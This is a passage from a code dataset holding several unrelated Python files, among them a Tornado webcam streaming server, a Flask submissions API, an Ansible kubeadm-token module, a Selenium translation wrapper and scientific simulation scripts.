Over\")\r\n\r\n\r\nmain()\r\n","sub_path":"Battleship.py","file_name":"Battleship.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"337771710","text":"import cv2\r\nimport imagezmq\r\nimport tornado.ioloop\r\nimport tornado.web\r\nimport tornado.websocket\r\nimport threading\r\nimport base64\r\n\r\n\r\nhub = imagezmq.ImageHub()\r\ngImage = None\r\ngRpi_name = None\r\n\r\nclass IndexHandler(tornado.web.RequestHandler):\r\n def get(self):\r\n self.render('index.html', ws_text=\"ws\")\r\n\r\nclass webCamHandler(tornado.web.RequestHandler):\r\n\r\n def get(self, cam_id):\r\n self.render('index.html', ws_text=\"ws/\"+cam_id)\r\n\r\nclass CamSocketHandler(tornado.websocket.WebSocketHandler):\r\n def __init__(self, *args, **kwargs):\r\n super(CamSocketHandler, self).__init__(*args, **kwargs)\r\n self.camNum = None\r\n\r\n def open(self, *args, **kwargs):\r\n print(\"WebSocket opened\")\r\n self.camNum = args[0]\r\n print(\"camNum :\"+self.camNum)\r\n\r\n def on_message(self, message):\r\n\r\n image = gImage\r\n\r\n if image is not None and self.camNum == gRpi_name:\r\n image = base64.b64encode(image)\r\n self.write_message(image)\r\n\r\n def on_close(self):\r\n print(\"WebSocket closed\")\r\n\r\nclass SocketHandler(tornado.websocket.WebSocketHandler):\r\n def __init__(self, *args, **kwargs):\r\n super(SocketHandler, self).__init__(*args, **kwargs)\r\n\r\n def on_message(self, message):\r\n\r\n image = gImage\r\n\r\n if image is not None:\r\n image = base64.b64encode(image)\r\n self.write_message(image)\r\n\r\n def open(self):\r\n print(\"WebSocket opened\")\r\n\r\n def on_close(self):\r\n print(\"WebSocket closed\")\r\n\r\ndef get_image():\r\n global gImage\r\n global gRpi_name\r\n while True:\r\n gRpi_name, gImage = hub.recv_jpg()\r\n hub.send_reply(b'OK')\r\n\r\napp = tornado.web.Application([\r\n (r'/', IndexHandler),\r\n (r\"/webcam/([0-9]+)\", webCamHandler),\r\n (r'/ws/([0-9]+)', CamSocketHandler),\r\n (r'/ws', SocketHandler)\r\n])\r\n\r\nif __name__ == \"__main__\":\r\n t = threading.Thread(target=get_image)\r\n t.daemon = True\r\n t.start()\r\n app.listen(7777)\r\n tornado.ioloop.IOLoop.current().start()\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"177893452","text":"from src.blockchain_utils.credentials import get_client, get_account_credentials\nfrom src.services.game_engine_service import GameEngineService\n\nclient = get_client()\n\nacc_pk, acc_address, _ = get_account_credentials(account_id=4)\nplayer_x_pk, player_x_address, _ = get_account_credentials(account_id=1)\nplayer_o_pk, player_o_address, _ = get_account_credentials(account_id=2)\n\ngame_engine = GameEngineService(app_creator_pk=acc_pk,\n app_creator_address=acc_address,\n player_x_pk=player_x_pk,\n player_x_address=player_x_address,\n player_o_pk=player_o_pk,\n player_o_address=player_o_address)\n\ngame_engine.deploy_application(client=client)\ngame_engine.start_game(client=client)\n\ngame_actions = [\n (\"X\", 0),\n (\"O\", 1),\n (\"X\", 2),\n (\"O\", 4),\n (\"X\", 3),\n (\"O\", 5),\n (\"X\", 7),\n (\"O\", 6),\n (\"X\", 8),\n]\n\nfor player_id, action_position in game_actions:\n game_engine.play_action(client=client,\n player_id=player_id,\n 
action_position=action_position)\n\n\ngame_engine.fund_escrow(client=client)\ngame_engine.tie_money_refund(client=client)\n\n","sub_path":"tie_game.py","file_name":"tie_game.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"454600947","text":"from unittest.mock import patch\n\nimport pytest\n\nfrom db.models.clusters import Cluster\nfrom event_manager.events.cluster import CLUSTER_CREATED\nfrom event_manager.events.user import USER_ACTIVATED\nfrom factories.factory_users import UserFactory\nfrom tests.utils import BaseTest\nfrom tracker.publish_tracker import PublishTrackerService\n\n\n@pytest.mark.tracker_mark\nclass PublishTrackerTest(BaseTest):\n def setUp(self):\n self.cluster = Cluster.load()\n self.admin = UserFactory(is_staff=True, is_superuser=True)\n self.user = UserFactory()\n self.publisher = PublishTrackerService()\n self.publisher.setup()\n super().setUp()\n\n def test_record_calls_identify_if_cluster_created(self):\n with patch('analytics.identify') as mock_identify:\n with patch('analytics.track') as mock_track:\n self.publisher.record(event_type=USER_ACTIVATED,\n instance=self.user,\n actor_id=self.admin.id,\n actor_name=self.admin.username)\n\n assert mock_identify.call_count == 0\n assert mock_track.call_count == 1\n\n with patch('analytics.identify') as mock_identify:\n with patch('analytics.track') as mock_track:\n self.publisher.record(event_type=CLUSTER_CREATED,\n instance=self.cluster,\n namespace='test',\n environment='test',\n is_upgrade='test',\n provisioner_enabled=False,\n use_data_claim=False,\n use_outputs_claim=False,\n use_logs_claim=False,\n use_repos_claim=False,\n use_upload_claim=False,\n node_selector_core_enabled=False,\n node_selector_experiments_enabled=False,\n cli_min_version='',\n cli_latest_version='',\n platform_min_version='',\n platform_latest_version='',\n chart_version='',\n cpu=0,\n memory=0,\n gpu=0)\n\n assert mock_identify.call_count == 1\n assert mock_track.call_count == 1\n","sub_path":"tests/test_tracker/test_publish_tracker.py","file_name":"test_publish_tracker.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"235459571","text":"# SERVICE\n\n# Handles the API calls\n# NEVER returns views, only JSON\n\nimport json\nfrom flask import current_app as app, request, Response, jsonify\nfrom .submission import Submission\nimport time\n\n@app.route('/')\ndef hello_world():\n return 'Hello world !'\n\n@app.route('/dashboard', methods=['GET'])\ndef dashboard():\n # Based on the email, look up the submission and return it\n request_data = request.get_json()\n print(request_data)\n if request_data is not None:\n email = request_data.get('postulant_email', None)\n if email is not None:\n sub = Submission.find_sumbission_by_postulant_email(email)\n if sub is not None:\n return Submission.json(sub)\n return {}\n\n@app.route('/submissions', methods=['POST'])\ndef add_submission():\n request_data = request.get_json() \n Submission.add_submission(\n request_data[\"postulant_email\"],\n request_data[\"postulant_firstname\"],\n request_data[\"postulant_lastname\"],\n request_data[\"postulant_middlename\"],\n request_data.get(\"postulant_birthday\", None)\n )\n response = Response(\"Submission added\", 201, mimetype='application/json')\n return response\n\n\n
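# Return the full list of submissions as JSON\n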
@app.route('/submissions', methods=['GET'])\ndef get_submissions():\n return jsonify({'Submissions': Submission.get_all_submissions()})\n\n@app.route('/submissions/<int:subm_id>', methods=['GET'])\ndef get_submission(subm_id=0):\n subm = Submission.get_submission(subm_id)\n return jsonify(subm)\n\n@app.route('/submissions/<int:subm_id>/validate', methods=['POST'])\ndef validate_submission(subm_id=0):\n Submission.validate(subm_id)\n time.sleep(3)\n return Response(\"Registration validated\", 201, mimetype=\"application/json\")\n","sub_path":"application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"480269742","text":"#!/usr/bin/env python\n#\n# Copyright 2019 Caoyingjun\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nDOCUMENTATION = '''\nauthor: Caoyingjun\n\n'''\n\nimport os\nimport subprocess\nimport yaml\n\nfrom kubernetes import client\nfrom kubernetes import config\n\n\nKUBEADMIN = '/etc/kubernetes/admin.conf'\n\n\ndef get_kube_client():\n config.kube_config.load_kube_config(\n config_file=KUBEADMIN)\n return client.CoreV1Api()\n\n\nclass GetWoker(object):\n\n def __init__(self, params):\n self.params = params\n self.get_list = self.params.get('get_list')\n self.is_ha = self.params.get('is_ha')\n self.changed = False\n\n # Use this to store arguments to pass to exit_json()\n self.result = {}\n self.kube_client = get_kube_client()\n\n def get_token(self):\n os.environ['KUBECONFIG'] = KUBEADMIN\n cmd = 'kubeadm token list | grep system:bootstrappers'\n tokens = self._run(cmd)\n tokens = tokens.split('\\n')\n\n for tk in tokens:\n if not tk:\n continue\n tk = tk.split()\n if int(tk[1][:-1]) > 0:\n token = tk[0]\n break\n else:\n # if all the tokens are inactive, create a new one.\n recmd = 'kubeadm token create'\n new_token = self._run(recmd)\n token = new_token[:-1]\n self.changed = True\n\n self.result['token'] = token\n\n # Get the apiserver from KUBECONFIG\n def get_kube_apiserver(self):\n with open(KUBEADMIN, 'r') as f:\n kubeconfig = yaml.safe_load(f)\n\n kube_apiserver = kubeconfig['clusters'][0]['cluster']['server']\n\n self.result['apiserver'] = kube_apiserver.split('//')[-1]\n\n def get_token_ca_cert_hash(self):\n cmd = (\"openssl x509 -pubkey -in /etc/kubernetes/pki/ca.crt | \"\n \"openssl rsa -pubin -outform der 2>/dev/null | \"\n \"openssl dgst -sha256 -hex | sed 's/^.* //'\")\n token_ca_cert_hash = self._run(cmd)\n\n self.result['token_ca_cert_hash'] = token_ca_cert_hash[:-1]\n\n def get_certificate_key(self):\n if self.is_ha and self.result['masters_added']:\n os.environ['KUBECONFIG'] = KUBEADMIN\n cmd = 'kubeadm init phase upload-certs --upload-certs'\n certificate_key = self._run(cmd)\n certificate_key = certificate_key.split()[-1]\n self.result['certificate_key'] = certificate_key\n else:\n self.result['certificate_key'] = None\n\n def _run(self, cmd):\n proc = subprocess.Popen(cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n shell=True)\n stdout, _ = proc.communicate()\n return stdout\n\n @property\n def kube_nodes(self):\n kube_nodes = 
[node.metadata.name\n for node in self.kube_client.list_node().items]\n return kube_nodes\n\n def get_update_nodes(self):\n kube_masters = self.params.get('kube_masters')\n kube_workers = self.params.get('kube_workers')\n masters_sets = set(kube_masters) - set(self.kube_nodes)\n workers_sets = set(kube_workers) - set(self.kube_nodes)\n self.result['masters_added'] = list(masters_sets)\n self.result['workers_added'] = list(workers_sets - masters_sets)\n\n def run(self):\n self.get_kube_apiserver()\n self.get_update_nodes()\n self.get_token()\n self.get_token_ca_cert_hash()\n self.get_certificate_key()\n\n\ndef main():\n specs = dict(\n kube_masters=dict(type='list', required=True),\n kube_workers=dict(type='list', required=True),\n get_list=dict(type='list', required=True),\n is_ha=dict(type='bool', default=False),\n )\n\n module = AnsibleModule(argument_spec=specs, bypass_checks=True)\n params = module.params\n\n gw = None\n try:\n gw = GetWoker(params)\n gw.run()\n module.exit_json(changed=gw.changed, result=gw.result)\n except Exception as emsg:\n module.fail_json(changed=True, msg=emsg, faild=True)\n\n\n# import module snippets\nfrom ansible.module_utils.basic import * # noqa\nif __name__ == '__main__':\n main()\n","sub_path":"ansible/library/kube_get.py","file_name":"kube_get.py","file_ext":"py","file_size_in_byte":4719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"432432447","text":"def exchange_first_last(seq):\n a_new_sequence1 = seq[-1:]+seq[1:-1]+seq[0:1]\n return a_new_sequence1\n\ndef every_other(seq):\n a_new_sequence2 = seq[0::2]\n return a_new_sequence2\n\ndef middle_every_other(seq):\n a_new_sequence3 = seq[4:-4:2]\n return a_new_sequence3\n\ndef reversed(seq):\n a_new_sequence4 = seq[::-1]\n return a_new_sequence4\n\ndef thirds(seq):\n a=int(len(seq)/3)\n a_new_sequence5 = seq[a:]+seq[:a]\n return a_new_sequence5\n\na_string = \"this is a string\"\na_tuple = (2, 54, 13, 12, 5, 32)\n\nassert exchange_first_last(a_string) == \"ghis is a strint\"\nassert exchange_first_last(a_tuple) == (32, 54, 13, 12, 5, 2)\nassert every_other(a_string) == \"ti sasrn\"\nassert every_other(a_tuple) == (2,13,5)\nassert middle_every_other(a_string) == \" sas\"\nassert middle_every_other(a_tuple) == ()\nassert reversed(a_string) == \"gnirts a si siht\"\nassert reversed(a_tuple) == (32, 5, 12, 13, 54, 2)\nassert thirds(a_string) == \"is a stringthis \"\nassert thirds(a_tuple) == (13, 12, 5, 32, 2, 54)\n","sub_path":"students/Daniel_Spray/Lesson03/sequence_slicing.py","file_name":"sequence_slicing.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"69372867","text":"import requests,base64\nfrom lib.log import *\ndef get_code(file_name):\n data = {}\n path = \"\"\n url = 'http://127.0.0.1:6000/captcha'\n with open(file_name, \"rb\") as f:\n data0 = f.read()\n data = {\n 'data': str(base64.b64encode(data0),'utf-8')\n }\n headers={'Content-Type':'application/json'}\n try:\n res = requests.post(url=url,data=data,timeout=2)\n res = res.json()\n log_info(res)\n except:\n return \"0000\"\n return res['code']\n\t\n\n\n\t\nif __name__ == \"__main__\":\n\tprint(get_code(\"../image/24820.jpg\"))","sub_path":"lib/myapi.py","file_name":"myapi.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"363287560","text":"import sys\nimport pdb\nk=0\n#pdb.set_trace()\nfor 
line in sys.stdin:\n k=k+1\n line=line.replace('\\n',\"\")\n if line==\"0 0\":\n break\n else:\n if k!=1:\n print()\n L=line.split(\" \")\n (stvari,ponude)=(int(L[0]),int(L[1]))\n listastvari=[]\n for i in range (0,stvari):\n listastvari.append(input())\n maxartikli=0\n bestcijena=0\n bestponudac=\"\"\n for i in range (0,ponude):\n ponudac=input()\n podaci=input()\n podaci=podaci.split(\" \")\n (cijena,artikli)=(float(podaci[0]),int(podaci[1]))\n if i==0:\n bestcijena=cijena\n bestponudac=ponudac\n listaartikala=[]\n for j in range(0,artikli):\n listaartikala.append(input())\n poklapanja=0\n for j in range(0,len(listaartikala)):\n if listaartikala[j] in listastvari:\n poklapanja+=1\n if poklapanja >= maxartikli:\n if poklapanja==maxartikli:\n if cijena>1)\n y = y*(1.5-x2*y*y)\n y = y*(1.5-x2*y*y)\n return y\ndef cal2(n):\n y3 = np.array([n])\n y3 = y3.astype(np.float32)\n x2 = y3*0.5\n ii = y3.view(np.int32)\n ii[:] = 0x5f3759df - (ii >> 1)\n y3 = y3*(1.5-x2*y3*y3)\n y3 = y3*(1.5-x2*y3*y3)\n return y3\nif __name__ == \"__main__\":\n x = np.float32(2)\n print(cal2(2)[0])\n print(\"right result\", 1/np.sqrt(x))\n print(rqrt(x))","sub_path":"spyder/float64.py","file_name":"float64.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"626367436","text":"# -- coding: utf-8 --\r\nfrom django.shortcuts import render\r\nfrom django.views.decorators.http import require_http_methods\r\nfrom django.http import JsonResponse\r\nimport json\r\nfrom django.core import serializers\r\nfrom myapp.models import Story\r\nfrom myapp.models import Comment\r\n\r\n# Create your views here.\r\n@require_http_methods([\"GET\"])\r\ndef add_story(request):\r\n response = {}\r\n try:\r\n story = Story(title=request.GET.get('title'),content=request.GET.get('content'))\r\n story.save()\r\n response['msg'] = 'success'\r\n response['error_num'] = 0\r\n except Exception as e:\r\n response['msg'] = str(e)\r\n response['error_num'] = 1\r\n\r\n return JsonResponse(response)\r\n\r\n@require_http_methods([\"GET\"])\r\ndef show_storys(request):\r\n response = {}\r\n try:\r\n storys = Story.objects.filter()\r\n #storys = Story.objects.filter(id='1')\r\n response['list'] = json.loads(serializers.serialize(\"json\", storys))\r\n response['msg'] = 'success'\r\n response['error_num'] = 0\r\n except Exception as e:\r\n response['msg'] = str(e)\r\n response['error_num'] = 1\r\n\r\n return JsonResponse(response)\r\n\r\n@require_http_methods([\"GET\"])\r\ndef show_comments(request):\r\n response = {}\r\n try:\r\n comments = Comment.objects.filter()\r\n response['list'] = json.loads(serializers.serialize(\"json\", comments))\r\n response['msg'] = 'success'\r\n response['error_num'] = 0\r\n except Exception as e:\r\n response['msg'] = str(e)\r\n response['error_num'] = 1\r\n\r\n return JsonResponse(response)\r\n\r\n@require_http_methods([\"GET\"])\r\ndef add_comment(request):\r\n response = {}\r\n try:\r\n comment = Comment(commentId=request.GET.get('commentId'),commentContent=request.GET.get('commentContent'))\r\n comment.save()\r\n response['msg'] = 'success'\r\n response['error_num'] = 0\r\n except Exception as e:\r\n response['msg'] = str(e)\r\n response['error_num'] = 1\r\n\r\n return JsonResponse(response)","sub_path":"myapp/view/story.py","file_name":"story.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"498685839","text":"import 
matplotlib.pyplot as plt\nimport random\nimport numpy as np\n\ndef f():\n plt.plot(range(5))\n\ndef sample_df(df, samples):\n ''' Samples rows of a dataframe '''\n if samples >= len(df):\n return df\n else:\n rows = random.sample(df.index, samples)\n return df.ix[sorted(rows)]\n\ndef plot_daily_series(df, samples=5, title=None, ylim=None):\n ''' Given a dataframe containing daily series for sensors, \n randomly sample days, and plot the daily variation for those days'''\n if not samples is None:\n df = sample_df(df, samples)\n X = df.copy()\n # Find the minimum and maximum\n ymax = X.max().max()\n ymin = X.min().min()\n yrange = ymax - ymin\n fig = plt.figure(figsize=(15,5))\n ax = fig.add_subplot(221)\n fig.suptitle('yrange: %.5f'%yrange)\n if yrange == 0:\n yrange = 1\n #Add a small amount of random noise, so we can see overlapping lines\n X.index = X.index.droplevel(0)\n X.T.plot(ax=ax, grid=False, legend=False, title=title)\n ax.legend(loc='center left', bbox_to_anchor=(1,0.5), fancybox=True, shadow=True)\n # Set reasonable x/y limits. y slightly above/below the largest values\n plt.xlim([min(df.columns),max(df.columns)])\n if ylim is None:\n if yrange == 0:\n ymax, ymin = (-1,1)\n else:\n ymax += 0.1*yrange\n ymin -= 0.1*yrange\n ylim = [ymin, ymax] \n plt.ylim(ylim)\n ts = df.columns\n # downsample time to 12 points\n if len(ts) > 12:\n ts = [ts[i] for i in range(0,len(ts),len(ts)/12)]\n plt.xticks(ts,['%2d:%02d'%(t/60,t%60) for t in ts],rotation=70)\n","sub_path":"evaluate_visualize_model/analyze_tag_errs.py","file_name":"analyze_tag_errs.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"509559717","text":"import re\n\nimport pytesseract as pytesseract\nfrom PIL import Image\n\nregex_to_find_hungarian_text = r\"([A-ZÓÖŐÚÜŰÍÁÉ][,a-zóöőúüűíáé\\t\\s\\n-]+)/\"\n\nfile = \"mona.jpg\"\ntext = pytesseract.image_to_string(Image.open(file), lang=\"hun\")\nparsed_text = re.findall(regex_to_find_hungarian_text, text)\n\ndaily_menu = []\n\nfor element in parsed_text:\n if len(element) > 5:\n daily_menu.append(element.strip())\nprint(daily_menu)\n","sub_path":"feed_runners/MonaOCR.py","file_name":"MonaOCR.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"353753972","text":"#!/usr/bin/env python\n\"\"\"\nwuvt.py - WUVT now playing module for casca\n\"\"\"\n\n#from tools import GrumbleError\nfrom web import get as webget\n\n\ndef wuvt(casca, input):\n \"\"\".wuvt - Find out what is currently playing on the radio station WUVT.\"\"\"\n\n trackinfo = webget('https://www.wuvt.vt.edu/playlists/latest_track')\n casca.say(\"WUVT is currently playing \"+trackinfo)\n # trackinfo = web.json(data)\n \nwuvt.commands = ['wuvt']\nwuvt.example = '.wuvt'\n","sub_path":"modules/port/spotify2.py","file_name":"spotify2.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"343154072","text":"#!/usr/bin/env python\r\n# ----------------------------------------------------------------------------\r\n# \"THE BEER-WARE LICENSE\" (Revision 42):\r\n# wrote this file. As long as you retain this notice you\r\n# can do whatever you want with this stuff. If we meet some day, and you think\r\n# this stuff is worth it, you can buy me a beer in return to Terry Yin.\r\n#\r\n# Now google has stop providing free translation API. 
So I have to switch to\r\n# http://mymemory.translated.net/, which has a limit for 1000 words/day free\r\n# usage.\r\n#\r\n# The original idea of this is borrowed from 's brilliant work\r\n# https://github.com/soimort/google-translate-cli\r\n# ----------------------------------------------------------------------------\r\n'''\r\nThis is a simple, yet powerful command line translator with google translate\r\nbehind it. You can also use it as a Python module in your code.\r\n'''\r\nimport re\r\nimport json\r\nfrom selenium import webdriver\r\nfrom textwrap import wrap\r\nimport time\r\ntry:\r\n import urllib2 as request\r\n from urllib import quote\r\nexcept:\r\n from urllib import request\r\n from urllib.parse import quote\r\n\r\nclass Translator:\r\n def __init__(self, to_lang=\"zh_CN\", from_lang='en'):\r\n self.from_lang = from_lang\r\n self.to_lang = to_lang\r\n self.url=\"http://translate.google.com\"+\"/#\"+from_lang+\"/\"+to_lang\r\n self.driver=webdriver.Chrome()\r\n self.driver.get(self.url)\r\n self.timer=time.time()\r\n self.span=3\r\n self.input=\"\"#google输入框中本次输入信息\r\n self.output=\"\"#google输出狂中本次输出信息\r\n def get_input_element(self):\r\n return self.driver.find_element_by_xpath('//*[@id=\"source\"]')\r\n def get_button(self):\r\n return self.driver.find_element_by_xpath('//*[@id=\"gt-submit\"]')\r\n def get_output_element(self):\r\n return self.driver.find_element_by_xpath('//*[@id=\"result_box\"]')\r\n def translate(self, source):\r\n output_list=[]\r\n if self.from_lang == self.to_lang:\r\n return source\r\n else:\r\n source_list = wrap(source, 1000, replace_whitespace=False)\r\n for text in source_list:\r\n self.sendtext(text)\r\n while True:\r\n if \"...\" in text:\r\n output=self.get_output_element().text\r\n else:\r\n output=self.get_output_element().text.strip(\"...\")\r\n if output.find(\"正在翻译\",0)!=-1:\r\n time.sleep(self.span)\r\n elif self.output!=output or (self.input==text):\r\n output_list.append(output)\r\n #当条件成立后,更新储存的本次输入输出\r\n self.input=text\r\n self.output=output\r\n break\r\n elif time.time()-self.timer>30*self.span:#超时为30秒\r\n break\r\n else:\r\n time.sleep(self.span)\r\n return \" \".join(output_list)\r\n def sendtext(self,text):\r\n e=None\r\n if time.time()-self.timer\" % len(self.tuples)\n\n def __len__(self):\n return len(self.tuples)\n\n def __add__(self, other):\n return self.tuples + other.tuples\n\n def __and__(self, other):\n \"\"\"Pass Ngram() object here to find intersection between this and\n yours Ngram.tuples.\"\"\"\n\n return self.tuples & other.tuples\n\n @staticmethod\n def tokenize(sentence: str):\n \"\"\"Returns list of tokens of str.\"\"\"\n\n cyrr = r'%s\\w\\-' % RECYR\n regex = r'[%s]+|[^%s\\s]' % (cyrr, cyrr)\n return re.compile(regex).findall(sentence)\n\n def update(self, li):\n \"\"\"Update self.tuples with the given elements in li. 
li can be both\n set and list.\"\"\"\n\n return self.tuples.update(li)\n","sub_path":"exec/lib/grams.py","file_name":"grams.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"579946294","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport wisps\nimport wisps.simulations as wispsim\nimport matplotlib as mpl\nimport astropy.units as u\nfrom astropy.coordinates import SkyCoord\nimport theano\nimport theano.tensor as tt\nimport pandas as pd\nimport pymc3 as pm\nimport seaborn as sns \nfrom matplotlib.colors import Normalize\nimport numba\nfrom scipy import integrate\n\nfrom wisps.utils.tools import get_distance\nfrom tqdm import tqdm\n\n\n#imports\n#----------------------\n\n#constants\nRsun=wispsim.Rsun\nZsun=wispsim.Zsun\n\nspgrid=wispsim.SPGRID\n#-----------------------\n\n#read-in the pointings\npnts=wisps.OBSERVED_POINTINGS\nprint (pnts[0].survey)\nCOORDS=SkyCoord([p.coord for p in wisps.OBSERVED_POINTINGS ])\ngalc=COORDS.transform_to('galactic')\n\nLBS=np.vstack([[x.coord.galactic.l.radian,x.coord.galactic.b.radian] for x in pnts ])\n\nLS=galc.l.radian\nBS=galc.b.radian\n\n#OBSERVED_DIST=np.concatenate(np.array([v for v in pnts[0].dist_limits.values()]))\n#---------------------------\n\ndef sample_distances(nsample=1000, h=300):\n \"\"\"\n sample the galaxy given a scale height\n \n \"\"\"\n def logp(l, b, r, z, d, h):\n return np.log((d**2)*wispsim.density_function(r, z, h))\n\n with pm.Model() as model:\n l=pm.Uniform('l', lower=-2*np.pi, upper=2*np.pi, testval=np.pi/2, observed=LS)\n b=pm.Uniform('b', lower=-2*np.pi, upper=2*np.pi, testval=np.pi/3, observed=BS)\n \n d=pm.Uniform('d', lower=0., upper=6000, testval=500., shape=BS.shape)\n \n x=pm.Deterministic('x', Rsun-d*np.cos(b)*np.cos(l))\n y=pm.Deterministic('y', -d*np.cos(b)*np.sin(l))\n r=pm.Deterministic('r', (x**2+y**2)**0.5 )\n z=pm.Deterministic('z', Zsun+ d * np.sin(b))\n\n like = pm.DensityDist('likelihood', logp, observed={'l':l, 'b':b,\n 'r': r, 'z': z, 'd':d, 'h':h})\n\n trace = pm.sample(draws=int(nsample), cores=4, step=pm.Metropolis(), tune=int(nsample/20), discard_tuned_samples=True)\n\n return trace\n\n\n\n#measure volumes with changing scale heights\n#need to change this to directly measuring l and b and \n\ndef compute_distance_limits(pnt):\n \"\"\"\n computes distance limits based on limiting mags\n \"\"\"\n rels=wisps.POLYNOMIAL_RELATIONS\n\n dists=None\n \n #use F140W for 3d-hst pointing and f110w for wisps\n pol=None\n maglmts=None\n pol_unc=None\n\n if pnt.survey=='wisps':\n pol=rels['sp_F140W']\n pol_unc=rels['sigma_sp_F140W']\n maglmts= wisps.MAG_LIMITS['wisps']['F140W']\n if pnt.survey=='hst3d':\n pol=rels['sp_F140W']\n pol_unc=rels['sigma_sp_F140W']\n maglmts=wisps.MAG_LIMITS['hst3d']['F140W']\n\n #compute asbmags using abolute mag relations\n absmags=[get_accurate_relations(x, pol, pol_unc) for x in spgrid]\n relfaintmags=np.array([maglmts[0] for s in wispsim.SPGRID])\n relbrightmags=np.array([maglmts[1] for s in wispsim.SPGRID])\n \n #compute distances\n dmins=get_distance(absmags, relbrightmags)\n dmaxs=get_distance(absmags, relfaintmags)\n\n distances=np.array([dmaxs, dmins]).T\n\n return dict(zip(wispsim.SPGRID, distances))\n #create a dictionary\n\n#----------------------------------\n#save stuff \n\ndef save_all_stuff():\n #sample the galactic structure model\n import pickle\n\n full_dict={}\n\n for h in wispsim.HS:\n trace=sample_distances(nsample=2.5e4, h=h)\n #save each scale 
height separetly to avoid overloading the disk\n dists=np.array(trace['d'])\n rs=np.array(trace['r']) \n zs=np.array(trace['z'])\n full_dict[h]={ 'distances': dists, 'rs':rs, 'zs': zs}\n\n with open(wisps.OUTPUT_FILES+'/bayesian_pointings.pkl', 'wb') as file:\n pickle.dump(full_dict,file)\n return \n\nif __name__ =='__main__':\n #save_all_stuff()\n import wisps.simulations.effective_numbers as eff\n eff.simulation_outputs(recompute=True, hs=wispsim.HS)\n\n import wisps.simulations as wispsim\n wispsim.make_pointings()\n\n\n","sub_path":"wisps/simulations/compute_distances.py","file_name":"compute_distances.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"446287893","text":"\"\"\"\nAuthor: angles\n13/03/17 - 14:46\n\"\"\"\n\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom architectures import generator\nfrom plotting_tools import plot_images\nfrom utils import create_square_grid\nfrom utils import load_tf_model\n\nflags = tf.app.flags\nflags.DEFINE_integer(\"z_dim\", 32, \"dimension of the representation\")\nflags.DEFINE_integer(\"nb_samples\", 1, \"Training batch size\")\nflags.DEFINE_integer(\"output_size\", 64, \"Generated images' size, also cropping size\")\nflags.DEFINE_integer(\"nb_channels_output\", 3, \"3:RGB, 1:Gray-scale\")\nflags.DEFINE_string(\"name_experiment\", 'convex_hulls_Zdim32', \"Folder that contains the model\")\nFLAGS = flags.FLAGS\n\nprint(\"Name of the experiment: {0}\".format(FLAGS.name_experiment))\ndir_experiment = os.path.join('experiments', FLAGS.name_experiment)\n\nshape_z = (FLAGS.nb_samples, FLAGS.z_dim)\nz = tf.random_uniform(shape_z, minval=-1, maxval=1, dtype=tf.float32)\noutput_shape = (FLAGS.output_size, FLAGS.output_size, FLAGS.nb_channels_output)\n\nwith tf.variable_scope('generation'):\n outputs_ = generator(z, output_shape=output_shape, is_training=False)\n nb_layers = len(outputs_)\n\n# imgs_tensor = tf.multiply(tf.add(imgs_tensor_tanh, 1), 127.5)\n# Create a session for running operations in the Graph\n######################################################\nsess = tf.Session()\n# Initialize the variables\nsess.run(tf.global_variables_initializer())\n\nsaver = tf.train.Saver()\nload_success, ckpt_name = load_tf_model(dir_experiment, sess, saver)\nif load_success:\n print(\" [*] Load SUCCESS\")\nelse:\n print(\" [!] 
